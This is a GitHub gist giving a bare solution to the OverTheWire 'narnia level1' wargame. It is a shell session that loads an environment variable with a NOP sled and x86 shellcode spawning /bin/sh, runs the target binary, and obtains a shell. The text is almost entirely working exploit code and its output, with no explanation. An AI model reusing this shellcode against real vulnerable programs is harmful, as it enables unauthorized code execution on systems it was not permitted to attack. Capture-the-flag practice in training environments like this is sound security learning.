Skip to content

Instantly share code, notes, and snippets.

@plvhx
Last active December 22, 2016 12:53
Show Gist options
  • Save plvhx/c91cbc8abc2d49e21483d9b02967524c to your computer and use it in GitHub Desktop.
Save plvhx/c91cbc8abc2d49e21483d9b02967524c to your computer and use it in GitHub Desktop.
overthewire.org narnia level1
narnia1@melinda:/narnia$ export EGG=$(python -c 'print "\x90"*(200) + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"')
narnia1@melinda:/narnia$ ./narnia1
Trying to execute EGG!
$
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment